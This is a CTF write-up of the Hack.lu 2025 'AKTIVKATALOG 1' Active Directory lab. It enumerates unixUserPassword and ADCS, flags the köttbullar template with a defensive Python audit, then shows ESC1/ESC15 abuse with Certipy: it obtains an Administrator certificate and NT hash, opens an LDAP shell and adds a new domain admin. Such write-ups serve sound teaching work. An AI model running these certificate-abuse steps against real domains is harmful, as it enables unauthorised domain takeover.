AKTIVKATALOG 1 is an Active Directory challenge from Hack.lu CTF 2025, created by NeffIsBack and Steffen. It involves enumerating the unixUserPassword attribute and ADCS.
Note
My NetExec version is the latest; I installed it using:
```
➜ tools git clone https://github.com/Pennyw0rth/NetExec
➜ tools cd NetExec
➜ NetExec git:(main) ✗ python3 -m pipx install . --force
Installing to existing venv 'netexec'
  installed package netexec 1.4.0+1009.3d407b47, installed using Python 3.12.3
  These apps are now globally available
    - NetExec
    - netexec
    - nxc
    - nxcdb
done! ✨ 🌟 ✨
```
Running netexec with the --users and --shares flags doesn't show anything suspicious. However, we can use the --computers flag to enumerate domain computers.
As you can see, we have the DC01$ account and another computer account called dator$. There is an LDAP attribute called unixUserPassword that is sometimes populated with plaintext credentials. To enumerate it, we can use the get-unixUserPassword module from netexec, which in this case returns the computer account's password.
One important thing to check in an Active Directory environment is ADCS (Active Directory Certificate Services). Let's use the adcs module from netexec to see if it is in use.
Indeed, ADCS is present here. The next step is to look for vulnerable templates using a tool like Certipy. NetExec recently added a module called certipy-find that works like the certipy find command to look for vulnerable templates.
```
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'hack-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'hack-DC01-CA'
[*] Checking web enrollment for CA 'hack-DC01-CA' @ 'DC01.hack.lu'
[!] Error checking web enrollment: [Errno 104] Connection reset by peer
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : hack-DC01-CA
    DNS Name                            : DC01.hack.lu
    Certificate Subject                 : CN=hack-DC01-CA, DC=hack, DC=lu
    Certificate Serial Number           : 49A6DF796B66B08746F83C67B8A882D3
    Certificate Validity Start          : 2025-10-08 14:46:23+00:00
    Certificate Validity End            : 2030-10-08 14:55:34+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : HACK.LU\Administrators
      Access Rights
        ManageCa                        : HACK.LU\Administrators
                                          HACK.LU\Domänadministratörer
                                          HACK.LU\Företagsadministratörer
        ManageCertificates              : HACK.LU\Administrators
                                          HACK.LU\Domänadministratörer
                                          HACK.LU\Företagsadministratörer
        Enroll                          : HACK.LU\Authenticated Users
Certificate Templates
  0
    Template Name                       : köttbullar
    Display Name                        : köttbullar
    Certificate Authorities             : hack-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-08T14:59:46+00:00
    Template Last Modified              : 2025-10-08T14:59:46+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HACK.LU\Domändatorer
      Object Control Permissions
        Owner                           : HACK.LU\Företagsadministratörer
        Full Control Principals         : HACK.LU\Domänadministratörer
                                          HACK.LU\Local System
                                          HACK.LU\Företagsadministratörer
        Write Owner Principals          : HACK.LU\Domänadministratörer
                                          HACK.LU\Local System
                                          HACK.LU\Företagsadministratörer
        Write Dacl Principals           : HACK.LU\Domänadministratörer
                                          HACK.LU\Local System
                                          HACK.LU\Företagsadministratörer
    [+] User Enrollable Principals      : HACK.LU\Domändatorer
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.
      ESC15                             : Enrollee supplies subject and schema version is 1.
    [*] Remarks
      ESC15                             : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
      ESC2 Target Template              : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
      ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
```
As you can see from the output of both tools, the köttbullar template is vulnerable to ESC1 and ESC15. In this writeup we will exploit both.
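As an added example (not code from the writeup, Certipy or NetExec), the audit below reproduces the two conditions certipy-find reported for köttbullar, so a defender can run the same check over a template export; the Template record and the set of low-privilege principals are assumptions modelled on the output above.

```python
"""Audit ADCS certificate templates for ESC1 and ESC15 (added example, not
Certipy/NetExec code; the Template record and principal set are assumptions)."""
from dataclasses import dataclass, field

# Principals that every domain member effectively holds. The Swedish name is the
# localized group from the certipy-find output (Domändatorer = Domain Computers).
LOW_PRIV_PRINCIPALS = {"HACK.LU\\Authenticated Users", "HACK.LU\\Domain Users",
                       "HACK.LU\\Domain Computers", "HACK.LU\\Domändatorer"}

@dataclass
class Template:
    """The certipy-find fields that decide ESC1/ESC15 for one template."""
    name: str
    enabled: bool
    enrollee_supplies_subject: bool
    client_authentication: bool
    requires_manager_approval: bool
    authorized_signatures_required: int
    schema_version: int
    enrollment_rights: list[str] = field(default_factory=list)

def find_escalations(tpl: Template, low_priv=frozenset(LOW_PRIV_PRINCIPALS)) -> list[str]:
    """Return the ESC codes a low-privileged principal could abuse on tpl."""
    # Both paths need a usable template: enabled, enrollable by a low-privileged
    # principal, and issued without a manager-approval or co-signature gate.
    if not tpl.enabled or not any(p in low_priv for p in tpl.enrollment_rights):
        return []
    if tpl.requires_manager_approval or tpl.authorized_signatures_required > 0:
        return []
    findings = []
    # ESC1: the requester chooses the subject/SAN and the cert is valid for logon.
    if tpl.enrollee_supplies_subject and tpl.client_authentication:
        findings.append("ESC1")
    # ESC15 (CVE-2024-49019): the requester chooses the subject on a schema v1
    # template, so the request can inject application policies on unpatched CAs.
    if tpl.enrollee_supplies_subject and tpl.schema_version == 1:
        findings.append("ESC15")
    return findings

# Constructed from the certipy-find output for the köttbullar template above.
KOTTBULLAR = Template("köttbullar", True, True, True, False, 0, 1,
                      ["HACK.LU\\Domändatorer"])
# The same template with manager approval required: one of the standard fixes.
HARDENED = Template("köttbullar", True, True, True, True, 0, 1,
                    ["HACK.LU\\Domändatorer"])
```

Removing EnrolleeSuppliesSubject, dropping the low-privilege enrollment right, or requiring manager approval each makes the check return no findings.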
ESC1
The Certipy wiki is a good place to find more information about ESC1 and the commands to exploit it. I also created a cheatsheet for ADCS that includes all the commands to exploit each escalation. More ADCS resources are listed in the resources section at the end of this writeup.
```
[*] Requesting certificate via RPC
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate object SID is 'S-1-5-21-215134972-1129381140-2588549801-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
```
```
➜ certipy auth -pfx administrator.pfx -domain hack.lu -u 'administrator' -dc-ip 10.244.0.10
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'Administrator'
[*]     SAN URL SID: 'S-1-5-21-215134972-1129381140-2588549801-500'
[*]     Security Extension SID: 'S-1-5-21-215134972-1129381140-2588549801-500'
[*] Using principal: 'administrator@hack.lu'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hack.lu': aad3b435b51404eeaad3b435b51404ee:a6b9330f65063062dc3d567db7d4e695
```
With the Domain Administrator hash in hand, we can grab our flag located in C:\Users\Administratör\Desktop\flag.txt.
```
[*] Requesting certificate via RPC
[*] Request ID is 6
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@hack.lu'
[*] Certificate object SID is 'S-1-5-21-215134972-1129381140-2588549801-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
```
```
➜ certipy auth -pfx administrator.pfx -dc-ip 10.244.0.10 -ldap-shell
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@hack.lu'
[*]     SAN URL SID: 'S-1-5-21-215134972-1129381140-2588549801-500'
[*]     Security Extension SID: 'S-1-5-21-215134972-1129381140-2588549801-500'
[*] Connecting to 'ldaps://10.244.0.10:636'
[*] Authenticated to '10.244.0.10' as: 'u:HACK\\Administratör'
Type help for list of commands

# whoami
u:HACK\Administratör
```
With this LDAP shell we can do a lot. The easiest way is to create a new user and add them to the domain admins (sorry, I mean Domänadministratörer) group.
```
# add_user serioton
Attempting to create user in: %s CN=Users,DC=hack,DC=lu
Adding new user with username: serioton and password: LyX\mX!ry]G{W;D result: OK

# add_user_to_group serioton Domänadministratörer
Adding user: serioton to group Domänadministratörer result: OK
```